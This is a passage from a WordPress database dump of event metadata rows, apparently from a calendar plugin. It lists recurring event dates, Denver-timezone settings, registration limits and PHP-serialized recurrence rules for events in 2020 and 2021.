2816340;s:10:\"post_title\";i:1582816340;s:12:\"post_content\";i:1582816509;s:16:\"_EventRecurrence\";i:1606927730;s:11:\"post_status\";i:1582816509;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1606927731;s:26:\"_RTECregistrationsDisabled\";i:1606927730;s:17:\"_RTECdeadlineType\";i:1606927730;s:19:\"_RTECwhoCanRegister\";i:1606927730;s:23:\"_RTEClimitRegistrations\";i:1606927730;s:21:\"_RTECmaxRegistrations\";i:1606927730;s:22:\"_EventHideFromUpcoming\";i:1606927730;}'),(88136,259055,'_EventOrigin','events-calendar'),(88137,259055,'_EventOrigin','events-calendar'),(88145,259055,'_EventStartDateUTC','2020-03-13 00:00:00'),(88146,259055,'_EventEndDateUTC','2020-03-13 01:30:00'),(88135,259055,'_EventOrigin','events-calendar'),(88147,259055,'_EventDuration','5400'),(88148,259055,'_EventCurrencySymbol',''),(88149,259055,'_EventCurrencyPosition','prefix'),(88150,259055,'_EventCost',''),(88151,259055,'_EventURL',''),(88152,259055,'_EventTimezone','America/Denver'),(88153,259055,'_EventTimezoneAbbr','MDT'),(88155,259055,'_dp_original','257632'),(88156,259055,'_edit_lock','1607458748:2'),(88165,259055,'_edit_last','2'),(88179,259055,'_EventRecurrence','a:3:{s:5:\"rules\";a:0:{}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(104114,262441,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1607071445;s:12:\"_EventOrigin\";i:1607071445;s:13:\"_thumbnail_id\";i:1607071861;s:24:\"boldgrid_hide_page_title\";i:1607071445;s:17:\"_EventShowMapLink\";i:1607071445;s:13:\"_EventShowMap\";i:1607071445;s:15:\"_EventStartDate\";i:1607071861;s:13:\"_EventEndDate\";i:1607071861;s:18:\"_EventStartDateUTC\";i:1607071861;s:16:\"_EventEndDateUTC\";i:1607071861;s:14:\"_EventDuration\";i:1607071861;s:20:\"_EventCurrencySymbol\";i:1607071445;s:22:\"_EventCurrencyPosition\";i:1607071445;s:10:\"_EventCost\";i:1607071445;s:9:\"_EventURL\";i:1607071445;s:14:\"_EventTimezone\";i:1607071445;s:18:\"_EventTimezoneAbbr\";i:1607071445;s:27:\"_EventNextPendingRecurrence\";i:1607071445;s:26:\"_RTECregistrationsDisabled\";i:1607071445;s:17:\"_RTECdeadlineType\";i:1607071445;s:19:\"_RTECwhoCanRegister\";i:1607071445;s:23:\"_RTEClimitRegistrations\";i:1607071445;s:21:\"_RTECmaxRegistrations\";i:1607071445;s:16:\"_EventRecurrence\";i:1607071445;s:18:\"_RTECnumRegistered\";i:1607071445;s:12:\"_dp_original\";i:1607071445;s:13:\"_EventVenueID\";i:1607071445;s:16:\"tribe_events_cat\";i:1609185788;s:10:\"_edit_last\";i:1607071468;s:12:\"post_content\";i:1607072314;s:10:\"post_title\";i:1607071652;s:11:\"post_status\";i:1607071861;}'),(104123,262441,'boldgrid_hide_page_title','0'),(118807,262953,'_RTECregistrationsDisabled','1'),(118000,262916,'_EventStartDate','2021-08-01 09:00:00'),(118001,262916,'_EventStartDateUTC','2021-08-01 15:00:00'),(118002,262916,'_EventEndDate','2021-08-01 10:15:00'),(118003,262916,'_EventEndDateUTC','2021-08-01 16:15:00'),(118724,262915,'_EventCurrencyPosition','prefix'),(118725,262915,'_EventCost',''),(118726,262915,'_EventURL',''),(118727,262915,'_EventTimezone','America/Denver'),(118729,262915,'_TribeEventsPRO_RecurrenceQueue','a:5:{s:6:\"create\";a:0:{}s:6:\"update\";a:10:{i:262909;a:2:{s:9:\"timestamp\";i:1609664400;s:8:\"duration\";i:4500;}i:262910;a:2:{s:9:\"timestamp\";i:1612688400;s:8:\"duration\";i:4500;}i:262911;a:2:{s:9:\"timestamp\";i:1615107600;s:8:\"duration\";i:4500;}i:262912;a:2:{s:9:\"timestamp\";i:1617526800;s:8:\"duration\";i:4500;}i:262913;a:2:{s:9:\"timestamp\";i:1619946000;s:8:\"duration\";i:4500;}i:262914;a:2:{s:9:\"timestamp\";i:1622970000;s:8:\"duration\";i:4500;}i:262915;a:2:{s:9:\"timestamp\";i:1625389200;s:8:\"duration\";i:4500;}i:262916;a:2:{s:9:\"timestamp\";i:1627808400;s:8:\"duration\";i:4500;}i:262917;a:2:{s:9:\"timestamp\";i:1630832400;s:8:\"duration\";i:4500;}i:262918;a:2:{s:9:\"timestamp\";i:1633251600;s:8:\"duration\";i:4500;}}s:6:\"delete\";a:0:{}s:7:\"exclude\";a:0:{}s:8:\"original\";i:10;}'),(103167,129179,'_RTECregistrationsDisabled','1'),(103169,129179,'_RTECwhoCanRegister','any'),(103170,129179,'_RTEClimitRegistrations','0'),(103171,129179,'_RTECmaxRegistrations','30'),(103172,129179,'_EventHideFromUpcoming','yes'),(118721,262915,'_EventShowMap','1'),(118722,262915,'_EventVenueID','262507'),(118723,262915,'_EventCurrencySymbol',''),(118720,262915,'_EventShowMapLink','1'),(118716,262915,'_RTEClimitRegistrations','0'),(118717,262915,'_RTECmaxRegistrations','30'),(118718,262915,'boldgrid_hide_page_title','0'),(118719,262915,'_EventRecurrence','a:3:{s:5:\"rules\";a:1:{i:0;a:6:{s:4:\"type\";s:6:\"Custom\";s:6:\"custom\";a:4:{s:8:\"interval\";s:1:\"1\";s:5:\"month\";a:3:{s:8:\"same-day\";s:2:\"no\";s:6:\"number\";s:5:\"First\";s:3:\"day\";s:1:\"7\";}s:9:\"same-time\";s:3:\"yes\";s:4:\"type\";s:7:\"Monthly\";}s:8:\"end-type\";s:2:\"On\";s:3:\"end\";s:10:\"2021-10-03\";s:14:\"EventStartDate\";s:19:\"2020-12-06 09:00:00\";s:12:\"EventEndDate\";s:19:\"2020-12-06 10:15:00\";}}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(118841,262954,'boldgrid_hide_page_title','0'),(118822,262953,'_TribeEventsPRO_RecurrenceQueue','a:5:{s:6:\"create\";a:10:{i:0;a:2:{s:9:\"timestamp\";i:1610269200;s:8:\"duration\";i:4500;}i:1;a:2:{s:9:\"timestamp\";i:1613293200;s:8:\"duration\";i:4500;}i:2;a:2:{s:9:\"timestamp\";i:1615712400;s:8:\"duration\";i:4500;}i:3;a:2:{s:9:\"timestamp\";i:1618131600;s:8:\"duration\";i:4500;}i:4;a:2:{s:9:\"timestamp\";i:1620550800;s:8:\"duration\";i:4500;}i:5;a:2:{s:9:\"timestamp\";i:1623574800;s:8:\"duration\";i:4500;}i:6;a:2:{s:9:\"timestamp\";i:1625994000;s:8:\"duration\";i:4500;}i:7;a:2:{s:9:\"timestamp\";i:1628413200;s:8:\"duration\";i:4500;}i:8;a:2:{s:9:\"timestamp\";i:1631437200;s:8:\"duration\";i:4500;}i:9;a:2:{s:9:\"timestamp\";i:1633856400;s:8:\"duration\";i:4500;}}s:6:\"update\";a:0:{}s:6:\"delete\";a:0:{}s:7:\"exclude\";a:0:{}s:8:\"original\";i:10;}'),(118713,262915,'_RTECregistrationsDisabled','1'),(118714,262915,'_RTECdeadlineType','start'),(118715,262915,'_RTECwhoCanRegister','any'),(118712,262915,'_EventOrigin','events-calendar'),(118818,262953,'_EventCurrencyPosition','prefix'),(118819,262953,'_EventCost',''),(118820,262953,'_EventURL',''),(118821,262953,'_EventTimezone','America/Denver'),(117974,262915,'_EventEndDateUTC','2021-07-04 16:15:00'),(117975,262915,'_EventDuration','4500'),(118827,262954,'_EventStartDateUTC','2021-02-14 16:00:00'),(118833,262954,'_tribe_modified_fields','a:20:{s:12:\"_EventOrigin\";i:1607545353;s:16:\"protect_children\";i:1607545353;s:13:\"_thumbnail_id\";i:1607545353;s:26:\"_RTECregistrationsDisabled\";i:1607545353;s:17:\"_RTECdeadlineType\";i:1607545353;s:19:\"_RTECwhoCanRegister\";i:1607545353;s:23:\"_RTEClimitRegistrations\";i:1607545353;s:21:\"_RTECmaxRegistrations\";i:1607545353;s:24:\"boldgrid_hide_page_title\";i:1607545353;s:16:\"_EventRecurrence\";i:1607545353;s:17:\"_EventShowMapLink\";i:1607545353;s:13:\"_EventShowMap\";i:1607545353;s:13:\"_EventVenueID\";i:1607545353;s:20:\"_EventCurrencySymbol\";i:1607545353;s:22:\"_EventCurrencyPosition\";i:1607545353;s:10:\"_EventCost\";i:1607545353;s:9:\"_EventURL\";i:1607545353;s:14:\"_EventTimezone\";i:1607545353;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1607545353;s:16:\"tribe_events_cat\";i:1607570553;}'),(118832,262954,'protect_children',''),(118711,262915,'_tribe_modified_fields','a:19:{s:16:\"protect_children\";i:1607513876;s:12:\"_EventOrigin\";i:1607513876;s:26:\"_RTECregistrationsDisabled\";i:1607513876;s:17:\"_RTECdeadlineType\";i:1607513876;s:19:\"_RTECwhoCanRegister\";i:1607513876;s:23:\"_RTEClimitRegistrations\";i:1607513876;s:21:\"_RTECmaxRegistrations\";i:1607513876;s:24:\"boldgrid_hide_page_title\";i:1607513876;s:16:\"_EventRecurrence\";i:1607513876;s:17:\"_EventShowMapLink\";i:1607513876;s:13:\"_EventShowMap\";i:1607513876;s:13:\"_EventVenueID\";i:1607513876;s:20:\"_EventCurrencySymbol\";i:1607513876;s:22:\"_EventCurrencyPosition\";i:1607513876;s:10:\"_EventCost\";i:1607513876;s:9:\"_EventURL\";i:1607513876;s:14:\"_EventTimezone\";i:1607513876;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1607513876;s:13:\"_thumbnail_id\";i:1607513876;}'),(118083,262919,'protect_children',''),(118084,262919,'_tribe_modified_fields','a:30:{s:16:\"protect_children\";i:1607513170;s:12:\"_EventOrigin\";i:1607513170;s:10:\"_edit_last\";i:1607513181;s:10:\"post_title\";i:1607513256;s:11:\"post_status\";i:1607513312;s:12:\"post_content\";i:1607513312;s:16:\"tribe_events_cat\";i:1607538512;s:13:\"_thumbnail_id\";i:1607513312;s:26:\"_RTECregistrationsDisabled\";i:1607513312;s:17:\"_RTECdeadlineType\";i:1607513312;s:19:\"_RTECwhoCanRegister\";i:1607513312;s:23:\"_RTEClimitRegistrations\";i:1607513312;s:21:\"_RTECmaxRegistrations\";i:1607513312;s:24:\"boldgrid_hide_page_title\";i:1607513312;s:16:\"_EventRecurrence\";i:1607545353;s:17:\"_EventShowMapLink\";i:1607513312;s:13:\"_EventShowMap\";i:1607513312;s:13:\"_EventVenueID\";i:1607513312;s:15:\"_EventStartDate\";i:1607513312;s:13:\"_EventEndDate\";i:1607513312;s:18:\"_EventStartDateUTC\";i:1607513312;s:16:\"_EventEndDateUTC\";i:1607513312;s:14:\"_EventDuration\";i:1607513312;s:20:\"_EventCurrencySymbol\";i:1607513312;s:22:\"_EventCurrencyPosition\";i:1607513312;s:10:\"_EventCost\";i:1607513312;s:9:\"_EventURL\";i:1607513312;s:14:\"_EventTimezone\";i:1607513312;s:18:\"_EventTimezoneAbbr\";i:1607513312;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1607545354;}'),(118085,262919,'_EventOrigin','events-calendar'),(118086,262919,'_edit_lock','1619288096:2'),(118087,262919,'_edit_last','2'),(117797,262909,'_EventStartDate','2021-01-03 09:00:00'),(117798,262909,'_EventStartDateUTC','2021-01-03 16:00:00'),(117799,262909,'_EventEndDate','2021-01-03 10:15:00'),(117800,262909,'_EventEndDateUTC','2021-01-03 17:15:00'),(117801,262909,'_EventDuration','4500'),(118834,262954,'_EventOrigin','events-calendar'),(118842,262954,'_EventRecurrence','a:3:{s:5:\"rules\";a:1:{i:0;a:6:{s:4:\"type\";s:6:\"Custom\";s:6:\"custom\";a:4:{s:8:\"interval\";s:1:\"1\";s:5:\"month\";a:3:{s:8:\"same-day\";s:2:\"no\";s:6:\"number\";s:6:\"Second\";s:3:\"day\";s:1:\"7\";}s:9:\"same-time\";s:3:\"yes\";s:4:\"type\";s:7:\"Monthly\";}s:8:\"end-type\";s:2:\"On\";s:3:\"end\";s:10:\"2021-10-10\";s:14:\"EventStartDate\";s:19:\"2020-12-13 09:00:00\";s:12:\"EventEndDate\";s:19:\"2020-12-13 10:15:00\";}}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(117502,262897,'_TribeEventsPRO_RecurrenceQueue','a:5:{s:6:\"create\";a:10:{i:0;a:2:{s:9:\"timestamp\";i:1610650800;s:8:\"duration\";i:5400;}i:1;a:2:{s:9:\"timestamp\";i:1613070000;s:8:\"duration\";i:5400;}i:2;a:2:{s:9:\"timestamp\";i:1615489200;s:8:\"duration\";i:5400;}i:3;a:2:{s:9:\"timestamp\";i:1617908400;s:8:\"duration\";i:5400;}i:4;a:2:{s:9:\"timestamp\";i:1620932400;s:8:\"duration\";i:5400;}i:5;a:2:{s:9:\"timestamp\";i:1623351600;s:8:\"duration\";i:5400;}i:6;a:2:{s:9:\"timestamp\";i:1625770800;s:8:\"duration\";i:5400;}i:7;a:2:{s:9:\"timestamp\";i:1628794800;s:8:\"duration\";i:5400;}i:8;a:2:{s:9:\"timestamp\";i:1631214000;s:8:\"duration\";i:5400;}i:9;a:2:{s:9:\"timestamp\";i:1634238000;s:8:\"duration\";i:5400;}}s:6:\"update\";a:0:{}s:6:\"delete\";a:0:{}s:7:\"exclude\";a:0:{}s:8:\"original\";i:10;}'),(117513,262898,'protect_children',''),(117507,262898,'_EventStartDate','2021-04-08 19:00:00'),(117508,262898,'_EventStartDateUTC','2021-04-09 01:00:00'),(117509,262898,'_EventEndDate','2021-04-08 20:30:00'),(117510,262898,'_EventEndDateUTC','2021-04-09 02:30:00'),(118089,262919,'_RTECregistrationsDisabled','1'),(117511,262898,'_EventDuration','5400'),(117512,262898,'_tribe_modified_fields','a:20:{s:24:\"boldgrid_hide_page_title\";i:1607512642;s:12:\"_EventOrigin\";i:1607512642;s:16:\"protect_children\";i:1607512642;s:13:\"_thumbnail_id\";i:1607512642;s:26:\"_RTECregistrationsDisabled\";i:1607512642;s:17:\"_RTECdeadlineType\";i:1607512642;s:19:\"_RTECwhoCanRegister\";i:1607512642;s:23:\"_RTEClimitRegistrations\";i:1607512642;s:21:\"_RTECmaxRegistrations\";i:1607512642;s:16:\"_EventRecurrence\";i:1607512642;s:17:\"_EventShowMapLink\";i:1607512642;s:13:\"_EventShowMap\";i:1607512642;s:13:\"_EventVenueID\";i:1607512642;s:20:\"_EventCurrencySymbol\";i:1607512642;s:22:\"_EventCurrencyPosition\";i:1607512642;s:10:\"_EventCost\";i:1607512642;s:9:\"_EventURL\";i:1607512642;s:14:\"_EventTimezone\";i:1607512642;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1607512642;s:16:\"tribe_events_cat\";i:1607537842;}'),(117514,262898,'_tribe_modified_fields','a:20:{s:24:\"boldgrid_hide_page_title\";i:1607512642;s:12:\"_EventOrigin\";i:1607512642;s:16:\"protect_children\";i:1607512642;s:13:\"_thumbnail_id\";i:1607512642;s:26:\"_RTECregistrationsDisabled\";i:1607512642;s:17:\"_RTECdeadlineType\";i:1607512642;s:19:\"_RTECwhoCanRegister\";i:1607512642;s:23:\"_RTEClimitRegistrations\";i:1607512642;s:21:\"_RTECmaxRegistrations\";i:1607512642;s:16:\"_EventRecurrence\";i:1607512642;s:17:\"_EventShowMapLink\";i:1607512642;s:13:\"_EventShowMap\";i:1607512642;s:13:\"_EventVenueID\";i:1607512642;s:20:\"_EventCurrencySymbol\";i:1607512642;s:22:\"_EventCurrencyPosition\";i:1607512642;s:10:\"_EventCost\";i:1607512642;s:9:\"_EventURL\";i:1607512642;s:14:\"_EventTimezone\";i:1607512642;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1607512642;s:16:\"tribe_events_cat\";i:1607537842;}'),(151799,266081,'mec_organizer_id','1'),(117517,262898,'_RTECregistrationsDisabled','1'),(117518,262898,'_RTECdeadlineType','start'),(117519,262898,'_RTECwhoCanRegister','any'),(117520,262898,'_RTEClimitRegistrations','0'),(117521,262898,'_RTECmaxRegistrations','30'),(117515,262898,'_EventOrigin','events-calendar'),(117522,262898,'boldgrid_hide_page_title','0'),(117523,262898,'_EventRecurrence','a:3:{s:5:\"rules\";a:1:{i:0;a:6:{s:4:\"type\";s:6:\"Custom\";s:6:\"custom\";a:4:{s:8:\"interval\";s:1:\"1\";s:5:\"month\";a:3:{s:8:\"same-day\";s:2:\"no\";s:6:\"number\";s:6:\"Second\";s:3:\"day\";s:1:\"4\";}s:9:\"same-time\";s:3:\"yes\";s:4:\"type\";s:7:\"Monthly\";}s:8:\"end-type\";s:2:\"On\";s:3:\"end\";s:10:\"2021-10-14\";s:14:\"EventStartDate\";s:19:\"2020-12-10 19:00:00\";s:12:\"EventEndDate\";s:19:\"2020-12-10 20:30:00\";}}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(117524,262898,'_EventShowMapLink','1'),(117525,262898,'_EventShowMap','1'),(117526,262898,'_EventVenueID','262507'),(117527,262898,'_EventCurrencySymbol',''),(117528,262898,'_EventCurrencyPosition','prefix'),(117529,262898,'_EventCost',''),(117530,262898,'_EventURL',''),(117531,262898,'_EventTimezone','America/Denver'),(117532,262898,'_TribeEventsPRO_RecurrenceQueue','a:5:{s:6:\"create\";a:10:{i:0;a:2:{s:9:\"timestamp\";i:1610650800;s:8:\"duration\";i:5400;}i:1;a:2:{s:9:\"timestamp\";i:1613070000;s:8:\"duration\";i:5400;}i:2;a:2:{s:9:\"timestamp\";i:1615489200;s:8:\"duration\";i:5400;}i:3;a:2:{s:9:\"timestamp\";i:1617908400;s:8:\"duration\";i:5400;}i:4;a:2:{s:9:\"timestamp\";i:1620932400;s:8:\"duration\";i:5400;}i:5;a:2:{s:9:\"timestamp\";i:1623351600;s:8:\"duration\";i:5400;}i:6;a:2:{s:9:\"timestamp\";i:1625770800;s:8:\"duration\";i:5400;}i:7;a:2:{s:9:\"timestamp\";i:1628794800;s:8:\"duration\";i:5400;}i:8;a:2:{s:9:\"timestamp\";i:1631214000;s:8:\"duration\";i:5400;}i:9;a:2:{s:9:\"timestamp\";i:1634238000;s:8:\"duration\";i:5400;}}s:6:\"update\";a:0:{}s:6:\"delete\";a:0:{}s:7:\"exclude\";a:0:{}s:8:\"original\";i:10;}'),(117791,262907,'_EventTimezoneAbbr','MST'),(117543,262899,'protect_children',''),(117537,262899,'_EventStartDate','2021-05-13 19:00:00'),(117538,262899,'_EventStartDateUTC','2021-05-14 01:00:00'),(117539,262899,'_EventEndDate','2021-05-13 20:30:00'),(117540,262899,'_EventEndDateUTC','2021-05-14 02:30:00'),(117541,262899,'_EventDuration','5400'),(117542,262899,'_tribe_modified_fields','a:20:{s:24:\"boldgrid_hide_page_title\";i:1607512642;s:12:\"_EventOrigin\";i:1607512642;s:16:\"protect_children\";i:1607512642;s:13:\"_thumbnail_id\";i:1607512642;s:26:\"_RTECregistrationsDisabled\";i:1607512642;s:17:\"_RTECdeadlineType\";i:1607512642;s:19:\"_RTECwhoCanRegister\";i:1607512642;s:23:\"_RTEClimitRegistrations\";i:1607512642;s:21:\"_RTECmaxRegistrations\";i:1607512642;s:16:\"_EventRecurrence\";i:1607512642;s:17:\"_EventShowMapLink\";i:1607512642;s:13:\"_EventShowMap\";i:1607512642;s:13:\"_EventVenueID\";i:1607512642;s:20:\"_EventCurrencySymbol\";i:1607512642;s:22:\"_EventCurrencyPosition\";i:1607512642;s:10:\"_EventCost\";i:1607512642;s:9:\"_EventURL\";i:1607512642;s:14:\"_EventTimezone\";i:1607512642;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1607512642;s:16:\"tribe_events_cat\";i:1607537842;}'),(117544,262899,'_tribe_modified_fields','a:20:{s:24:\"boldgrid_hide_page_title\";i:1607512642;s:12:\"_EventOrigin\";i:1607512642;s:16:\"protect_children\";i:1607512642;s:13:\"_thumbnail_id\";i:1607512642;s:26:\"_RTECregistrationsDisabled\";i:1607512642;s:17:\"_RTECdeadlineType\";i:1607512642;s:19:\"_RTECwhoCanRegister\";i:1607512642;s:23:\"_RTEClimitRegistrations\";i:1607512642;s:21:\"_RTECmaxRegistrations\";i:1607512642;s:16:\"_EventRecurrence\";i:1607512642;s:17:\"_EventShowMapLink\";i:1607512642;s:13:\"_EventShowMap\";i:1607512642;s:13:\"_EventVenueID\";i:1607512642;s:20:\"_EventCurrencySymbol\";i:1607512642;s:22:\"_EventCurrencyPosition\";i:1607512642;s:10:\"_EventCost\";i:1607512642;s:9:\"_EventURL\";i:1607512642;s:14:\"_EventTimezone\";i:1607512642;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1607512642;s:16:\"tribe_events_cat\";i:1607537842;}'),(151798,266081,'mec_dont_show_map','0'),(117547,262899,'_RTECregistrationsDisabled','1'),(117548,262899,'_RTECdeadlineType','start'),(117549,262899,'_RTECwhoCanRegister','any'),(117550,262899,'_RTEClimitRegistrations','0'),(117551,262899,'_RTECmaxRegistrations','30'),(117545,262899,'_EventOrigin','events-calendar'),(117552,262899,'boldgrid_hide_page_title','0'),(117553,262899,'_EventRecurrence','a:3:{s:5:\"rules\";a:1:{i:0;a:6:{s:4:\"type\";s:6:\"Custom\";s:6:\"custom\";a:4:{s:8:\"interval\";s:1:\"1\";s:5:\"month\";a:3:{s:8:\"same-day\";s:2:\"no\";s:6:\"number\";s:6:\"Second\";s:3:\"day\";s:1:\"4\";}s:9:\"same-time\";s:3:\"yes\";s:4:\"type\";s:7:\"Monthly\";}s:8:\"end-type\";s:2:\"On\";s:3:\"end\";s:10:\"2021-10-14\";s:14:\"EventStartDate\";s:19:\"2020-12-10 19:00:00\";s:12:\"EventEndDate\";s:19:\"2020-12-10 20:30:00\";}}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(117554,262899,'_EventShowMapLink','1'),(117555,262899,'_EventShowMap','1'),(117556,262899,'_EventVenueID','262507'),(117557,262899,'_EventCurrencySymbol',''),(117558,262899,'_EventCurrencyPosition','prefix'),(117559,262899,'_EventCost',''),(117560,262899,'_EventURL',''),(117561,262899,'_EventTimezone','America/Denver'),(117562,262899,'_TribeEventsPRO_RecurrenceQueue','a:5:{s:6:\"create\";a:10:{i:0;a:2:{s:9:\"timestamp\";i:1610650800;s:8:\"duration\";i:5400;}i:1;a:2:{s:9:\"timestamp\";i:1613070000;s:8:\"duration\";i:5400;}i:2;a:2:{s:9:\"timestamp\";i:1615489200;s:8:\"duration\";i:5400;}i:3;a:2:{s:9:\"timestamp\";i:1617908400;s:8:\"duration\";i:5400;}i:4;a:2:{s:9:\"timestamp\";i:1620932400;s:8:\"duration\";i:5400;}i:5;a:2:{s:9:\"timestamp\";i:1623351600;s:8:\"duration\";i:5400;}i:6;a:2:{s:9:\"timestamp\";i:1625770800;s:8:\"duration\";i:5400;}i:7;a:2:{s:9:\"timestamp\";i:1628794800;s:8:\"duration\";i:5400;}i:8;a:2:{s:9:\"timestamp\";i:1631214000;s:8:\"duration\";i:5400;}i:9;a:2:{s:9:\"timestamp\";i:1634238000;s:8:\"duration\";i:5400;}}s:6:\"update\";a:0:{}s:6:\"delete\";a:0:{}s:7:\"exclude\";a:0:{}s:8:\"original\";i:10;}'),(117790,262907,'_EventTimezone','America/Denver'),(117787,262907,'_EventCurrencyPosition','prefix'),(117573,262900,'protect_children',''),(117786,262907,'_EventCurrencySymbol',''),(117567,262900,'_EventStartDate','2021-06-10 19:00:00'),(117789,262907,'_EventURL',''),(117568,262900,'_EventStartDateUTC','2021-06-11 01:00:00'),(117569,262900,'_EventEndDate','2021-06-10 20:30:00'),(117788,262907,'_EventCost',''),(117570,262900,'_EventEndDateUTC','2021-06-11 02:30:00'),(117571,262900,'_EventDuration','5400'),(117572,262900,'_tribe_modified_fields','a:20:{s:24:\"boldgrid_hide_page_title\";i:1607512642;s:12:\"_EventOrigin\";i:1607512642;s:16:\"protect_children\";i:1607512642;s:13:\"_thumbnail_id\";i:1607512642;s:26:\"_RTECregistrationsDisabled\";i:1607512642;s:17:\"_RTECdeadlineType\";i:1607512642;s:19:\"_RTECwhoCanRegister\";i:1607512642;s:23:\"_RTEClimitRegistrations\";i:1607512642;s:21:\"_RTECmaxRegistrations\";i:1607512642;s:16:\"_EventRecurrence\";i:1607512642;s:17:\"_EventShowMapLink\";i:1607512642;s:13:\"_EventShowMap\";i:1607512642;s:13:\"_EventVenueID\";i:1607512642;s:20:\"_EventCurrencySymbol\";i:1607512642;s:22:\"_EventCurrencyPosition\";i:1607512642;s:10:\"_EventCost\";i:1607512642;s:9:\"_EventURL\";i:1607512642;s:14:\"_EventTimezone\";i:1607512642;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1607512642;s:16:\"tribe_events_cat\";i:1607537842;}'),(117574,262900,'_tribe_modified_fields','a:20:{s:24:\"boldgrid_hide_page_title\";i:1607512642;s:12:\"_EventOrigin\";i:1607512642;s:16:\"protect_children\";i:1607512642;s:13:\"_thumbnail_id\";i:1607512642;s:26:\"_RTECregistrationsDisabled\";i:1607512642;s:17:\"_RTECdeadlineType\";i:1607512642;s:19:\"_RTECwhoCanRegister\";i:1607512642;s:23:\"_RTEClimitRegistrations\";i:1607512642;s:21:\"_RTECmaxRegistrations\";i:1607512642;s:16:\"_EventRecurrence\";i:1607512642;s:17:\"_EventShowMapLink\";i:1607512642;s:13:\"_EventShowMap\";i:1607512642;s:13:\"_EventVenueID\";i:1607512642;s:20:\"_EventCurrencySymbol\";i:1607512642;s:22:\"_EventCurrencyPosition\";i:1607512642;s:10:\"_EventCost\";i:1607512642;s:9:\"_EventURL\";i:1607512642;s:14:\"_EventTimezone\";i:1607512642;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1607512642;s:16:\"tribe_events_cat\";i:1607537842;}'),(151797,266081,'mec_location_id','118'),(117577,262900,'_RTECregistrationsDisabled','1'),(117578,262900,'_RTECdeadlineType','start'),(117579,262900,'_RTECwhoCanRegister','any'),(117580,262900,'_RTEClimitRegistrations','0'),(117581,262900,'_RTECmaxRegistrations','30'),(117575,262900,'_EventOrigin','events-calendar'),(117582,262900,'boldgrid_hide_page_title','0'),(117583,262900,'_EventRecurrence','a:3:{s:5:\"rules\";a:1:{i:0;a:6:{s:4:\"type\";s:6:\"Custom\";s:6:\"custom\";a:4:{s:8:\"interval\";s:1:\"1\";s:5:\"month\";a:3:{s:8:\"same-day\";s:2:\"no\";s:6:\"number\";s:6:\"Second\";s:3:\"day\";s:1:\"4\";}s:9:\"same-time\";s:3:\"yes\";s:4:\"type\";s:7:\"Monthly\";}s:8:\"end-type\";s:2:\"On\";s:3:\"end\";s:10:\"2021-10-14\";s:14:\"EventStartDate\";s:19:\"2020-12-10 19:00:00\";s:12:\"EventEndDate\";s:19:\"2020-12-10 20:30:00\";}}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(117584,262900,'_EventShowMapLink','1'),(117585,262900,'_EventShowMap','1'),(117586,262900,'_EventVenueID','262507'),(117587,262900,'_EventCurrencySymbol',''),(117588,262900,'_EventCurrencyPosition','prefix'),(117589,262900,'_EventCost',''),(117590,262900,'_EventURL',''),(117591,262900,'_EventTimezone','America/Denver'),(117592,262900,'_TribeEventsPRO_RecurrenceQueue','a:5:{s:6:\"create\";a:10:{i:0;a:2:{s:9:\"timestamp\";i:1610650800;s:8:\"duration\";i:5400;}i:1;a:2:{s:9:\"timestamp\";i:1613070000;s:8:\"duration\";i:5400;}i:2;a:2:{s:9:\"timestamp\";i:1615489200;s:8:\"duration\";i:5400;}i:3;a:2:{s:9:\"timestamp\";i:1617908400;s:8:\"duration\";i:5400;}i:4;a:2:{s:9:\"timestamp\";i:1620932400;s:8:\"duration\";i:5400;}i:5;a:2:{s:9:\"timestamp\";i:1623351600;s:8:\"duration\";i:5400;}i:6;a:2:{s:9:\"timestamp\";i:1625770800;s:8:\"duration\";i:5400;}i:7;a:2:{s:9:\"timestamp\";i:1628794800;s:8:\"duration\";i:5400;}i:8;a:2:{s:9:\"timestamp\";i:1631214000;s:8:\"duration\";i:5400;}i:9;a:2:{s:9:\"timestamp\";i:1634238000;s:8:\"duration\";i:5400;}}s:6:\"update\";a:0:{}s:6:\"delete\";a:0:{}s:7:\"exclude\";a:0:{}s:8:\"original\";i:10;}'),(117785,262907,'_EventDuration','4500'),(117782,262907,'_EventEndDate','2020-12-06 10:15:00'),(117603,262901,'protect_children',''),(117781,262907,'_EventStartDate','2020-12-06 09:00:00'),(117597,262901,'_EventStartDate','2021-07-08 19:00:00'),(117784,262907,'_EventEndDateUTC','2020-12-06 17:15:00'),(117598,262901,'_EventStartDateUTC','2021-07-09 01:00:00'),(117599,262901,'_EventEndDate','2021-07-08 20:30:00'),(117600,262901,'_EventEndDateUTC','2021-07-09 02:30:00'),(117783,262907,'_EventStartDateUTC','2020-12-06 16:00:00'),(117601,262901,'_EventDuration','5400'),(117602,262901,'_tribe_modified_fields','a:20:{s:24:\"boldgrid_hide_page_title\";i:1607512642;s:12:\"_EventOrigin\";i:1607512642;s:16:\"protect_children\";i:1607512642;s:13:\"_thumbnail_id\";i:1607512642;s:26:\"_RTECregistrationsDisabled\";i:1607512642;s:17:\"_RTECdeadlineType\";i:1607512642;s:19:\"_RTECwhoCanRegister\";i:1607512642;s:23:\"_RTEClimitRegistrations\";i:1607512642;s:21:\"_RTECmaxRegistrations\";i:1607512642;s:16:\"_EventRecurrence\";i:1607512642;s:17:\"_EventShowMapLink\";i:1607512642;s:13:\"_EventShowMap\";i:1607512642;s:13:\"_EventVenueID\";i:1607512642;s:20:\"_EventCurrencySymbol\";i:1607512642;s:22:\"_EventCurrencyPosition\";i:1607512643;s:10:\"_EventCost\";i:1607512643;s:9:\"_EventURL\";i:1607512643;s:14:\"_EventTimezone\";i:1607512643;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1607512643;s:16:\"tribe_events_cat\";i:1607537843;}'),(117604,262901,'_tribe_modified_